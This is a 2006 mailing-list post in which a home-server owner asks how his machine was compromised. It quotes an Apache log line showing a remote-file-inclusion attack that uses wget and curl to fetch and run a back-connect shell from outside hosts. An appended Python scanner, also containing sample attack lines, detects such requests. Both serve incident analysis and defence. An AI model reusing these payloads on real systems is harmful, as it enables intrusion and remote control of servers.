My home desktop was compromised, but how?

Carthik Sharma carthik at gmail.com
Tue Feb 28 20:44:21 UTC 2006


Hi,

I run an Apache and an SSH server from my home computer. I have not
installed any PHP scripts whatsoever. All that is there are text files
and the odd HTML file.

Somebody seems to have hacked into my desktop/server. I find files in
the /tmp/ directory (like "agent.8213") which I cannot open; these are
setuid-ed -- how do I open these?

In my Apache access logs, there are things like
"http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"

The above is a valid URL, and will take you to a script to deface
someone's PHP script etc., I suppose. Now, how did this malicious
hacker get into my computer?

(The full line is:
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"  )
How would I go about tracing how this incident happened?

Any server/security admins here that can help me with a little
patience? I really want to get to the root of this and find out why
whatever happened happened.

None of the passwords for the ssh accounts are dictionary words, in
fact all are combinations of letters, numbers and sometimes special
symbols.

I have done nothing special to modify Apache or the SSH daemon; in
fact, sshd listens on port 8888.

I could paste logs here, but they would be too long. For now, I have
stopped the Apache and SSH servers.

Any help will be most welcome. My security bubble just burst :(

Carthik.
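As an added example (not part of Carthik's post or any reply on the list), a small Python scanner that runs over constructed Apache access-log lines modelled on the request quoted above and flags the two tell-tale signs in it: a query parameter whose value is itself a URL (the remote-file-inclusion pattern aimed at `mosConfig_absolute_path`) and a chain of shell commands carried in a parameter. It also reports the HTTP status, since a 404 like the one in the post shows that request was not served by this host; the addresses are RFC 5737 placeholders and the command chain is shortened.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log lines in Apache combined format (placeholder
# addresses, shortened command chain; not copied from the original post).
SAMPLE_LOG = """\
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://203.0.113.9/cmd.txt?&cmd=cd%20/tmp;wget%20203.0.113.7/cback;chmod%20744%20cback;./cback HTTP/1.1" 404 303 "-" "Mozilla/4.0"
192.168.0.50 - - [26/Feb/2006:15:01:12 -0500] "GET /notes/todo.txt HTTP/1.1" 200 1184 "-" "Mozilla/5.0"
192.168.0.77 - - [26/Feb/2006:15:03:40 -0500] "GET /index.php?page=http://203.0.113.9/shell.txt HTTP/1.1" 200 512 "-" "curl/7.15"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Command words that begin a segment of a shell command chain.
SHELL_RE = re.compile(r'(?:^|[;|&`])\s*(?:cd|wget|curl|chmod|perl|sh|bash)\b')

def analyze_line(line):
    """Return a finding dict for a suspicious request, or None if clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, target, status = m.groups()
    parts = urlsplit(target)
    reasons = []
    for pair in parts.query.split('&'):          # split on '&' only, not ';'
        key, _, value = pair.partition('=')
        decoded = unquote(value)
        # A parameter whose value is a URL: the classic remote-file-inclusion
        # attempt against a PHP include path setting such as mosConfig_absolute_path.
        if re.match(r'https?://', decoded, re.I):
            reasons.append(f"remote URL in parameter {key!r}")
        # Chained shell commands (cd;wget;chmod;./x) smuggled in a parameter.
        if SHELL_RE.search(decoded) and ';' in decoded:
            reasons.append(f"shell command chain in parameter {key!r}")
    if not reasons:
        return None
    return {"ip": ip, "time": ts, "path": parts.path, "status": int(status),
            "served": status.startswith('2'), "reasons": reasons}

def analyze_log(text):
    """Scan every line of an access log and return the list of findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        served = "served" if f["served"] else "not served"
        print(f"{f['time']} {f['ip']} {f['path']} -> {f['status']} ({served}): "
              f"{'; '.join(f['reasons'])}")
```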


More information about the ubuntu-users mailing list